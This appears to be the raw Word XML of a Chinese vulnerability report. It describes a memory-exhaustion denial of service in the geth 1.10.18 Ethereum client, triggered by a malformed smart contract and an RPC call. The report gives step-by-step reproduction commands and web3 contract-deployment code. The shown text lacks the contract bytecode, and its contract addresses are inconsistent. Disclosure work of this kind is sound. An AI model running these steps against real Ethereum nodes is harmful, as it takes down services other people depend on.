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7D69" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以太</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>坊公链存在</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拒绝服务漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D6B" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00052206"/>
    <w:p w14:paraId="0F2C7D6C" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞类型：拒绝服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D6D" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞危害：</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以太坊公链节</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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</w:p>
    <w:p w14:paraId="0F2C7D6E" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件版本：1.10.18（最新版本）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D6F" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00052206"/>
    <w:p w14:paraId="0F2C7D70" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D71" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以太坊虚拟机模块执行RETURN指令时存在逻辑缺陷，攻击者通过构建畸形智能合约，在虚拟机执行智能合约代码时绕过分配内存资源的逻辑检查，就可以大量分配内存资源，造成主机资源耗尽，从而形成远程拒绝服务攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D72" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据区块链技术的特点，当用户事先部署智能合约至以太</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>坊公链</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，智能合约就会部署到每一个以太坊节点上，再通过RPC接口远程发起一个简单的RPC调用，就可以对以太坊节点形成远程拒绝服务攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D73" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用前提是以太坊节点服务器开启了RPC服务接口，同时配置文件中的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RPCGasCap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项设置了一个相当大的整数。在测试环境中为了测试方便，这两个条件很容易满足。如果区块链开发人员在正式环境连接以太</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>坊公链</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时忘记修改配置文件，该节点服务器就存在被攻击的风险。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D74" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00052206"/>
    <w:p w14:paraId="0F2C7D75" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复现步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF45308" w14:textId="6033929D" w:rsidR="00B72350" w:rsidRDefault="005E67AD" w:rsidP="005E67AD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，</w:t>
      </w:r>
      <w:r w:rsidR="00B72350">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00B53D39">
        <w:t>22.04</w:t>
      </w:r>
      <w:r w:rsidR="00B53D39">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7EE337" w14:textId="529284F8" w:rsidR="00B53D39" w:rsidRDefault="00AC541E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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geth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件版本，命令如下：</w:t>
      </w:r>
      <w:r w:rsidR="00C27E6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidR="00C27E6D">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00C27E6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidR="00C27E6D">
        <w:t>/go-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C27E6D">
        <w:t>ethereum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C27E6D">
        <w:t>/build/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C27E6D">
        <w:t>geth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C27E6D">
        <w:t xml:space="preserve"> version</w:t>
      </w:r>
      <w:r w:rsidR="00440AE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为1</w:t>
      </w:r>
      <w:r w:rsidR="00440AE7">
        <w:t>.10.18</w:t>
      </w:r>
      <w:r w:rsidR="00440AE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00440AE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>geth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00440AE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为以太坊</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的客户端软件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D76" w14:textId="26C30A21" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动以太坊进程</w:t>
      </w:r>
      <w:r w:rsidR="00AC541E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，命令如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D77" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:r>
        <w:t>~/code/go-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ethereum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/build/bin/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data0 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>networkid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 12345679 --http --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>http.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "8545" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>http.api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "db,eth,net,web3" --allow-insecure-unlock --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D78" w14:textId="7E6C9298" w:rsidR="00052206" w:rsidRDefault="005E67AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录</w:t>
      </w:r>
      <w:r w:rsidR="00511842">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，命令如下，登录后才能利用该账户</w:t>
      </w:r>
      <w:r w:rsidR="009052B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在以太</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009052B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>坊部署</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009052B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>智能合约：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D79" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>personal.unlockAccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eth.accounts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D7A" w14:textId="4EBD408C" w:rsidR="00052206" w:rsidRPr="00E07604" w:rsidRDefault="001A61E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E07604">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>部署</w:t>
      </w:r>
      <w:r w:rsidR="00511842" w:rsidRPr="00E07604">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>智能合约</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0011604F" w:rsidRPr="00E07604">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>tokenContract</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00511842" w:rsidRPr="00E07604">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="009052B3" w:rsidRPr="00E07604">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>智能合约</w:t>
      </w:r>
      <w:r w:rsidR="00511842" w:rsidRPr="00E07604">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidR="009052B3" w:rsidRPr="00E07604">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512B1770" w14:textId="77777777" w:rsidR="00FC09BD" w:rsidRDefault="00FC09BD" w:rsidP="00FC09BD">
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tokenContract</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = web3.eth.contract([{"constant</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":true</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,"inputs":[],"name":"name","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_name","type":"string"}],"name":"setName","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2EFE92" w14:textId="77777777" w:rsidR="00FC09BD" w:rsidRDefault="00FC09BD" w:rsidP="00FC09BD">
      <w:r>
        <w:t xml:space="preserve">var t = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tokenContract.new</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0EE933E8" w14:textId="77777777" w:rsidR="00FC09BD" w:rsidRDefault="00FC09BD" w:rsidP="00FC09BD">
      <w:r>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23791157" w14:textId="77777777" w:rsidR="00FC09BD" w:rsidRDefault="00FC09BD" w:rsidP="00FC09BD">
      <w:r>
        <w:t xml:space="preserve">     from: web3.eth.accounts[0], </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769B0A13" w14:textId="77777777" w:rsidR="00FC09BD" w:rsidRDefault="00FC09BD" w:rsidP="00FC09BD">
      <w:r>
        <w:t xml:space="preserve">     data: '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</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">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', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DE6214" w14:textId="77777777" w:rsidR="00FC09BD" w:rsidRDefault="00FC09BD" w:rsidP="00FC09BD">
      <w:r>
        <w:t xml:space="preserve">     gas: '4700000'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526577C0" w14:textId="77777777" w:rsidR="00FC09BD" w:rsidRDefault="00FC09BD" w:rsidP="00FC09BD">
      <w:r>
        <w:t xml:space="preserve">   }, function (e, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>contract){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="19AFDC77" w14:textId="77777777" w:rsidR="00FC09BD" w:rsidRDefault="00FC09BD" w:rsidP="00FC09BD">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>console.log(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>e, contract);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA9814C" w14:textId="77777777" w:rsidR="00FC09BD" w:rsidRDefault="00FC09BD" w:rsidP="00FC09BD">
      <w:r>
        <w:t xml:space="preserve">    if (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contract.address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> !== 'undefined') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D1FFB3" w14:textId="77777777" w:rsidR="00FC09BD" w:rsidRDefault="00FC09BD" w:rsidP="00FC09BD">
      <w:r>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>console.log(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">'Contract mined! address: ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>contract.address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + ' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>transactionHash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: ' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>contract.transactionHash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B4D9E" w14:textId="77777777" w:rsidR="00FC09BD" w:rsidRDefault="00FC09BD" w:rsidP="00FC09BD">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D263FFB" w14:textId="45ED8D33" w:rsidR="009052B3" w:rsidRDefault="00FC09BD" w:rsidP="00FC09BD">
      <w:r>
        <w:t xml:space="preserve"> })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEAA03B" w14:textId="48E6A970" w:rsidR="001A61E6" w:rsidRDefault="001A61E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到</w:t>
      </w:r>
      <w:r w:rsidR="000853B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>智能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合约已经成功部署</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D7B" w14:textId="31010DB6" w:rsidR="00052206" w:rsidRDefault="001A61E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidR="00FC09BD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>智能合约</w:t>
      </w:r>
      <w:r w:rsidR="00F0532C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>广播到其他以太坊节点并记录在以太坊区块链上</w:t>
      </w:r>
      <w:r w:rsidR="000829C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D7C" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>miner.start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCDFD14" w14:textId="4C26B717" w:rsidR="000853B6" w:rsidRPr="00E07604" w:rsidRDefault="000853B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E07604">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>可以看到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EB1BD8" w:rsidRPr="00E07604">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>tokenContract</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E07604">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>智能合约已经被记录到区块链上，智能合约地址的是</w:t>
      </w:r>
      <w:r w:rsidR="00562EA2" w:rsidRPr="00E07604">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0x2304d69d245da7f81cfe3e15f3ceeb273be54f9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D7D" w14:textId="07F93D43" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidR="00F0532C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>智能合约</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功部署后，停止</w:t>
      </w:r>
      <w:r w:rsidR="007D3187">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>广播</w:t>
      </w:r>
      <w:r w:rsidR="00562EA2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，命令如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D7E" w14:textId="77777777" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>miner.stop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235CC9A1" w14:textId="75B98ABB" w:rsidR="0021329C" w:rsidRDefault="0021329C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开一个新的终端，与以太坊客户端</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>geth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E01AC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建立连接，命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3931CF" w14:textId="6E3AEB07" w:rsidR="00E01AC0" w:rsidRDefault="00A94E74" w:rsidP="00E01AC0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>attach</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A94E74">
        <w:t>http://127.0.0.1:8545</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D7F" w14:textId="5FA2B6D5" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidR="00CE0AB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已部署的智能合约，命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B919616" w14:textId="77777777" w:rsidR="00CE0AB9" w:rsidRDefault="00CE0AB9" w:rsidP="00CE0AB9">
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = [{"constant</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":true</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,"inputs":[],"name":"name","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_name","type":"string"}],"name":"setName","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3794A0" w14:textId="77777777" w:rsidR="00CE0AB9" w:rsidRDefault="00CE0AB9" w:rsidP="00CE0AB9">
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MyContract</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>eth.contract</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B8190" w14:textId="6E4D6E4D" w:rsidR="00CE0AB9" w:rsidRDefault="00CE0AB9" w:rsidP="00CE0AB9">
      <w:r>
        <w:t>var t = MyContract.at("0xb66441c4776a2544207e5d768d1dff112559d428");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C7D81" w14:textId="06E9FB16" w:rsidR="00052206" w:rsidRDefault="00511842">
      <w:r>
        <w:t>var t = MyContract.at("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合约地址</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB4655B" w14:textId="77777777" w:rsidR="00C24724" w:rsidRDefault="00C24724" w:rsidP="00C24724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行智能合约函数，t.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>name(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
